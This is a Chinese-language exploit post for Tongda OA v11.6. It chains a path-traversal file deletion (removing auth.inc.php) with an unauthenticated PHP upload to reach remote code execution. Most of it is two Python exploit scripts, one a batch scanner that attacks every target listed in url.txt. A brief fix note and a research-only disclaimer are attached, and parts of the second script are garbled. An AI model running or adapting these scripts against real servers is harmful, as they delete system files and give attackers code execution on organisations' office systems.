通达OA v11.6 任意文件删除+文件上传
漏洞名称: 通达OA 任意文件删除+文件上传漏洞 影响范围: 通达OA v11.6 漏洞描述: 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。 攻击者可通过任意文件删除漏洞删除auth.inc.php,然后组合文件上传漏洞最终可造成远程代码执行(RCE)漏洞,从而导致服务器权限被拿下。
exp.py
'''
更新:
特别提醒:
本POC不是无损利用的,会让对方系统文件被删除导致无法正常工作
并且由于目标系统及网络环境不可控,该漏洞也不可能编写出在任何情况下都完全无损的EXP
使用时请一定一定要慎重,一定要获取对方书面授权再使用
如果仅仅想要检测漏洞的存在性,可以自己编写脚本只检测/module/appbuilder/assets/print.php是否存在
'''
import requests
target="http://127.0.0.1:8203/"
payload="<?php echo 123456 ?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[-]Failed to deleted auth.inc.php")
exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('hack.php', payload)}
requests.post(url=url,files=files)
url=target+"/_hack.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[+]Filed Uploaded Successfully")
print("[+]URL:",url)
else:
print("[-]Failed to upload file")
通达OA 0day漏洞 批量REC (仅研究学习)
”`python #! /usr/bin/env python3
–– coding: utf-8 ––
import requests #by Tommy,在原作者上修改而来,2020-8-19,通达OA 0 day漏洞利用 import sys version = sys.version_info if version < (3, 0): print(‘The current version is not supported, you need to use python3’) sys.exit()
def exploit(target): try: target=target payload=‘<?php echo md5(“exp-test”); ?>’#无害检测 print(target,“[*]删除auth.inc.php…”)
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"#删除auth.inc.php请求
requests.get(url=url,verify=False,timeout=10)
print(target,"[*]正在检查文件是否已删除...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url,verify=False,timeout=10).text
#print(page)
if 'No input file specified.' not in page:
print(target,"[-]无法删除auth.inc.php文件")
return 0
print(target,"[+]删除auth.inc.php成功")
print(target,"[*]开始上传payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files,verify=False,timeout=10)
url=target+"/_deconf.php"
page=requests.get(url=url,verify=False,timeout=10).text
if 'No input file specified.' not in page:
print("[+]************************文件已存在,上传成功************************")
if '8a8127bc83b94ad01414a7a3ea4b8' in page:#如果执行过md5函数,才确认漏洞存在,减少误报
print(target,"************************代码执行成功,存在漏洞************************")
print(target,"[+]URL:",url)
else:
print(target,"[-]文件上传失败")
except Exception as e:
print(target,e)
urls=‘url.txt’ print(“[*]警告:利用此漏洞,会删除auth.inc.php,这可能会损坏OA系统”) input(“按Enter继续”) for url in open(urls,‘r’,encoding=‘utf-8’).read().split(‘\n’): url=url.split() url=url.split() exploit(url[0]) “`
修复方案 删掉/module/appbuilder/assets/print.php 升级到最新版
请登录后查看回复内容